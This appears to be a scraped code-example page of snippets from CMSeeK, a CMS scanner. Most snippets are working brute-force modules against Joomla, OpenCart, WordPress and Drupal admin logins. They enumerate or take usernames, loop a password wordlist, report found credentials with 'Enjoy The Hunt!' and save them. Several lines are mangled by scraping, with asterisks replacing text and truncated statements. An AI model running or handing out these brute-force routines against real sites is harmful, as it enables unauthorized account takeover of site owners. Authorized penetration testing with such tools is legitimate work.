Exemplo n.º 1
0
def testlogin(url, user, passw):
    url = url + '/administrator/index.php'
    cj = http.cookiejar.FileCookieJar("cookieszz")
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(cj))
    joomloginsrc = opener.open(url).read().decode()
    parser = extInpTags()
    post_array = parser.feed(joomloginsrc)
    main_param = {'username': user, 'passwd': passw}
    other_param = parser.return_array
    post_data = main_param.copy()
    post_data.update(other_param)
    post_datad = urllib.parse.urlencode(post_data).encode("utf-8")
    ua = cmseek.randomua('generatenewuaeverytimetobesafeiguess')
    try:
        with opener.open(url, post_datad) as response:
            scode = response.read().decode()
            headers = str(response.info())
            rurl = response.geturl()
            r = [
                '1', scode, headers, rurl
            ]  ## 'success code', 'source code', 'http headers', 'redirect url'
            return r
    except Exception as e:
        e = str(e)
        r = ['2', e, '', '']  ## 'error code', 'error message', 'empty'
        return r
    print('hola')
Exemplo n.º 2
0
def testlogin(
    url,
    user,
    passw,
):
    url = url + '/admin/index.php'
    ua = cmseek.randomua('generatenewuaeverytimetobesafeiguess')
    try:
        ckreq = urllib.request.Request(url,
                                       data=urllib.parse.urlencode({
                                           'username':
                                           user,
                                           'password':
                                           passw
                                       }).encode("utf-8"),
                                       headers={'User-Agent': ua})
        with urllib.request.urlopen(ckreq, timeout=4) as response:
            scode = response.read().decode()
            headers = str(response.info())
            rurl = response.geturl()
            r = ['1', scode, headers,
                 rurl]  ## 'success code', 'source code', 'http headers'
            return r
    except Exception as e:
        e = str(e)
        r = ['2', e, '', '']  ## 'error code', 'error message', 'empty'
        return r
    print('hola')
Exemplo n.º 3
0
def start():
    cmseek.clearscreen()
    cmseek.banner("Joomla Bruteforce Module")
    url = cmseek.targetinp("")  # input('Enter Url: ')
    cmseek.info("Checking for Joomla")
    bsrc = cmseek.getsource(url, cmseek.randomua('foodislove'))
    joomcnf = '0'
    if bsrc[0] != '1':
        cmseek.error("Could not get target source, CMSeek is quitting")
        cmseek.handle_quit()
    else:
        ## Parse generator meta tag
        parse_generator = generator.parse(bsrc[1])
        ga = parse_generator[0]
        ga_content = parse_generator[1]

        try1 = generator.scan(ga_content)
        if try1[0] == '1' and try1[1] == 'joom':
            joomcnf = '1'
        else:
            try2 = source.check(bsrc[1], url)
            if try2[0] == '1' and try2[1] == 'joom':
                joomcnf = '1'
            else:
                try3 = header.check(bsrc[2])  # Headers Check!
                if try3[0] == '1' and try3[1] == 'joom':
                    joomcnf = '1'
                else:
                    joomcnf = '0'
    if joomcnf != '1':
        cmseek.error('Could not confirm Joomla... CMSeek is quitting')
        cmseek.handle_quit()
    else:
        cmseek.success(
            "Joomla Confirmed... Confirming form and getting token...")
        joomloginsrc = cmseek.getsource(url + '/administrator/index.php',
                                        cmseek.randomua('thatsprettygay'))
        if joomloginsrc[0] == '1' and '<form' in joomloginsrc[1]:
            # joomtoken = re.findall(r'type=\"hidden\" name=\"(.*?)\" value=\"1\"', joomloginsrc[1])
            # if len(joomtoken) == 0:
            #    cmseek.error('Unable to get token... CMSeek is quitting!')
            #    cmseek.handle_quit()
            # cmseek.success("Token grabbed successfully: " + cmseek.bold + joomtoken[0] + cmseek.cln)
            # token = joomtoken[0]
            joomparamuser = []
            rawuser = input(
                "[~] Enter Usernames with coma as separation without any space (example: cris,harry): "
            ).split(',')
            for rusr in rawuser:
                joomparamuser.append(rusr)
            joombruteusers = set(
                joomparamuser
            )  ## Strip duplicate usernames in case any smartass didn't read the full thing and entered admin as well
            for user in joombruteusers:
                passfound = '0'
                print('\n')
                cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
                passwords = pwd_file.read().split('\n')
                passwords.insert(0, user)
                for password in passwords:
                    if password != '' and password != '\n':
                        sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
                        sys.stdout.flush()
                        # print("Testing Pass: "******"Ret URL: " + str(cursrc[3]))
                        if 'logout' in str(cursrc[1]):
                            print('\n')
                            cmseek.success('Password found!')
                            print(" |\n |--[username]--> " + cmseek.bold +
                                  user + cmseek.cln +
                                  "\n |\n |--[password]--> " + cmseek.bold +
                                  password + cmseek.cln + "\n |")
                            cmseek.success('Enjoy The Hunt!')
                            cmseek.savebrute(url,
                                             url + '/administrator/index.php',
                                             user, password)
                            passfound = '1'
                            break
                        else:
                            continue
                        break
                if passfound == '0':
                    cmseek.error('\n\nCould Not find Password!')
                print('\n\n')

        else:
            cmseek.error("Couldn't find login form... CMSeeK is quitting")
            cmseek.handle_quit()
Exemplo n.º 4
0
if args.no_redirect:
    cmseek.redirect_conf = '2'

if args.update:
    cmseek.update()

if args.version:
    print('\n\n')
    cmseek.info("CMSeeK Version: " + cmseek.cmseek_version)
    cmseek.bye()

if args.user_agent is not None:
    cua = args.user_agent
elif args.random_agent is not None:
    cua = cmseek.randomua('random')
else:
    cua = None

if args.googlebot:
    cua = 'Googlebot/2.1 (+http://www.google.com/bot.html)'
if args.url is not None:
    s = args.url
    target = cmseek.process_url(s)
    if target != '0':
        if cua == None:
            cua = cmseek.randomua()
        core.main_proc(target, cua)
        cmseek.handle_quit()
elif args.list is not None:
    sites = args.list
Exemplo n.º 5
0
def start():
    cmseek.clearscreen()
    cmseek.banner("OpenCart Bruteforce Module")
    url = cmseek.targetinp("")  # input('Enter Url: ')
    cmseek.info("Checking for OpenCart")
    bsrc = cmseek.getsource(url, cmseek.randomua('foodislove'))
    if bsrc[0] != '1':
        cmseek.error("Could not get target source, CMSeek is quitting")
        cmseek.handle_quit()
    else:
        try1 = source.generator(bsrc[1])
        if try1[0] == '1' and try1[1] == 'oc':
            occnf = '1'
        else:
            try2 = source.check(bsrc[1], url)
            if try2[0] == '1' and try2[1] == 'oc':
                occnf = '1'
            else:
                occnf = '0'
    if occnf != '1':
        cmseek.error('Could not confirm OpenCart... CMSeek is quitting')
        cmseek.handle_quit()
    else:
        cmseek.success(
            "OpenCart Confirmed... Checking for OpenCart login form")
        ocloginsrc = cmseek.getsource(url + '/admin/index.php',
                                      cmseek.randomua('thatsprettygay'))
        if ocloginsrc[0] == '1' and '<form' in ocloginsrc[
                1] and 'route=common/login' in ocloginsrc[1]:
            cmseek.success("Login form found!")
            ocparamuser = ['']
            rawuser = input(
                "[~] Enter Usernames with coma as separation without any space (example: cris,harry): "
            ).split(',')
            for rusr in rawuser:
                ocparamuser.append(rusr)
            ocbruteusers = set(ocparamuser)  ## Strip duplicate usernames

            for user in ocbruteusers:
                if user != '':
                    passfound = '0'
                    print('\n')
                    cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
                    passwords = pwd_file.read().split('\n')
                    for password in passwords:
                        if password != '' and password != '\n':
                            sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
                            sys.stdout.flush()
                            cursrc = testlogin(url, user, password)
                            if 'route=common/dashboard&user_token=' in str(
                                    cursrc[3]):
                                cmseek.success('Password found!')
                                print(" |\n |--[username]--> " + cmseek.bold +
                                      user + cmseek.cln +
                                      "\n |\n |--[password]--> " +
                                      cmseek.bold + password + cmseek.cln +
                                      "\n |")
                                cmseek.success('Enjoy The Hunt!')
                                cmseek.savebrute(url, url + '/admin/index.php',
                                                 user, password)
                                passfound = '1'
                                break
                            else:
                                continue
                            break
                    if passfound == '0':
                        cmseek.error('\n\nCould Not find Password!')
                    print('\n\n')

        else:
            cmseek.error("Couldn't find login form... CMSeeK is quitting")
            cmseek.handle_quit()
Exemplo n.º 6
0
def start():
    cmseek.clearscreen()
    cmseek.banner("WordPress Bruteforce Module")
    url = cmseek.targetinp("")  # input('Enter Url: ')
    cmseek.info("Checking for WordPress")
    bsrc = cmseek.getsource(
        url,
        cmseek.randomua('thiscanbeanythingasfarasnowletitbewhatilovethemost'))
    if bsrc[0] != '1':
        # print(bsrc[1])
        cmseek.error("Could not get target source, CMSeek is quitting")
        cmseek.handle_quit()
    else:
        ## Parse generator meta tag
        parse_generator = generator.parse(bsrc[1])
        ga = parse_generator[0]
        ga_content = parse_generator[1]

        try1 = generator.scan(ga_content)
        if try1[0] == '1' and try1[1] == 'wp':
            wpcnf = '1'
        else:
            try2 = source.check(bsrc[1], url)
            if try2[0] == '1' and try2[1] == 'wp':
                wpcnf = '1'
            else:
                wpcnf = '0'
    if wpcnf != '1':
        print(bsrc[1])
        cmseek.error('Could not confirm WordPress... CMSeek is quitting')
        cmseek.handle_quit()
    else:
        cmseek.success(
            "WordPress Confirmed... Checking for WordPress login form")
        wploginsrc = cmseek.getsource(url + '/wp-login.php',
                                      cmseek.randomua('thatsprettygay'))
        if wploginsrc[0] == '1' and '<form' in wploginsrc[1]:
            cmseek.success(
                "Login form found.. Detecting Username For Bruteforce")
            wpparamuser = []
            uenum = wp_user_enum.start('wp', url, cmseek.randomua('r'), '0',
                                       bsrc[1])
            usernamesgen = uenum[0]
            wpparamuser = uenum[1]

            if wpparamuser == []:
                customuser = input(
                    "[~] CMSeek could not enumerate usernames, enter username if you know any: "
                )
                if customuser == "":
                    cmseek.error("No user found, CMSeek is quitting")
                else:
                    wpparamuser.append(customuser)
            wpbruteusers = set(wpparamuser)

            for user in wpbruteusers:
                passfound = '0'
                print('\n')
                cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
                passwords = pwd_file.read().split('\n')
                passwords.insert(0, user)
                for password in passwords:
                    if password != '' and password != '\n':
                        sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
                        sys.stdout.flush()
                        cursrc = cmseek.wpbrutesrc(url, user, password)
                        if 'wp-admin' in str(cursrc[3]):
                            cmseek.success('Password found!')
                            print(" |\n |--[username]--> " + cmseek.bold +
                                  user + cmseek.cln +
                                  "\n |\n |--[password]--> " + cmseek.bold +
                                  password + cmseek.cln + "\n |")
                            cmseek.success('Enjoy The Hunt!')
                            cmseek.savebrute(url, url + '/wp-login.php', user,
                                             password)
                            passfound = '1'
                            break
                        else:
                            continue
                        break
                if passfound == '0':
                    cmseek.error('\n\nCould Not find Password!')
                print('\n\n')

        else:
            cmseek.error("Couldn't find login form... CMSeeK is quitting")
            # print(wploginsrc[1])
            cmseek.handle_quit()
Exemplo n.º 7
0
def start():
    cmseek.clearscreen()
    cmseek.banner("Drupal Bruteforce Module")
    url = cmseek.targetinp("")  # input('Enter Url: ')
    cmseek.info("Checking for Drupal")
    bsrc = cmseek.getsource(url, cmseek.randomua('onceuponatime'))
    if bsrc[0] != '1':
        cmseek.error("Could not get target source, CMSeek is quitting")
        cmseek.handle_quit()
    else:
        ## Parse generator meta tag
        parse_generator = generator.parse(bsrc[1])
        ga = parse_generator[0]
        ga_content = parse_generator[1]

        try1 = generator.scan(ga_content)
        if try1[0] == '1' and try1[1] == 'dru':
            drucnf = '1'
        else:
            try2 = source.check(
                bsrc[1],
                url)  # Confirming Drupal using other source code checks
            if try2[0] == '1' and try2[1] == 'dru':
                drucnf = '1'
            else:
                try3 = header.check(bsrc[2])  # Headers Check!
                if try3[0] == '1' and try3[1] == 'dru':
                    drucnf = '1'
                else:
                    drucnf = '0'
    if drucnf != '1':
        cmseek.error('Could not confirm Drupal... CMSeek is quitting')
        cmseek.handle_quit()
    else:
        cmseek.success("Drupal Confirmed... Checking for Drupal login form")
        druloginsrc = cmseek.getsource(
            url + '/user/login/',
            cmseek.randomua('therelivedaguynamedkakashi'))
        if druloginsrc[0] == '1' and '<form' in druloginsrc[
                1] and 'name="form_id" value="' in druloginsrc[1]:
            cmseek.success("Login form found! Retriving form id value")
            fid = re.findall(r'name="form_id" value="(.*?)"', druloginsrc[1])
            if fid == []:
                cmseek.error("Could not find form_id, CMSeeK is quitting!")
                cmseek.handle_quit()
            else:
                cmseek.success('form_id found: ' + cmseek.bold + fid[0] +
                               cmseek.cln)
                form_id = fid[0]
            druparamuser = ['']
            rawuser = input(
                "[~] Enter Usernames with coma as separation without any space (example: cris,harry): "
            ).split(',')
            for rusr in rawuser:
                druparamuser.append(rusr)
            drubruteusers = set(druparamuser)  ## Strip duplicate usernames

            for user in drubruteusers:
                if user != '':
                    print('\n')
                    cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
                    passwords = pwd_file.read().split('\n')
                    passwords.insert(0, user)
                    passfound = '0'
                    for password in passwords:
                        if password != '' and password != '\n':
                            sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
                            sys.stdout.flush()
                            cursrc = testlogin(url, user, password, form_id)
                            # print(cursrc)
                            if '/user/login/' in str(cursrc):
                                continue
                            else:
                                cmseek.success('Password found! \n\n\n')
                                # print (cursrc)
                                cmseek.success('Password found!')
                                print(" |\n |--[username]--> " + cmseek.bold +
                                      user + cmseek.cln +
                                      "\n |\n |--[password]--> " +
                                      cmseek.bold + password + cmseek.cln +
                                      "\n |")
                                cmseek.success('Enjoy The Hunt!')
                                cmseek.savebrute(url, url + '/user/login',
                                                 user, password)
                                passfound = '1'
                                break
                            break
                    if passfound == '0':
                        cmseek.error('\n\nCould Not find Password!')
                    print('\n\n')

        else:
            cmseek.error("Couldn't find login form... CMSeeK is quitting")
            cmseek.handle_quit()
Exemplo n.º 8
0
print ("  [R]    Rebuild Cache (Use only when you add any custom module)")
print ("  [0]    Exit CMSeeK :( \n")

selone = input("Enter Your Desired Option: ").lower()
if selone == 'r':
    cmseek.update_brute_cache()
elif selone == 'u':
    cmseek.update()
elif selone == '0':
    cmseek.bye()
elif selone == "1":
    # There goes the cms detection thingy
    cmseek.clearscreen()
    cmseek.banner("CMS Detection And Deep Scan")
    site = cmseek.targetinp("") # Get The User input
    cua = cmseek.randomua()
    core.main_proc(site,cua)
    cmseek.handle_quit()

elif selone == '2':
    cmseek.clearscreen()
    cmseek.banner("CMS Detection And Deep Scan")
    sites_list = []
    sites = input('Enter comma separated urls(http://1.com,https://2.org) or enter path of file containing URLs (comma separated): ')
    if 'http' not in sites or '://' not in sites:
        cmseek.info('Treating input as path')
        try:
            ot = open(sites, 'r')
            file_contents = ot.read().replace('\n','')
            sites_list = file_contents.split(',')
        except FileNotFoundError:
Exemplo n.º 9
0
def cmseekapi(target, cua=None):
    target = cmseek.process_url(target)
    if cua == None:
        cua = cmseek.randomua()
    core.main_proc(target, cua)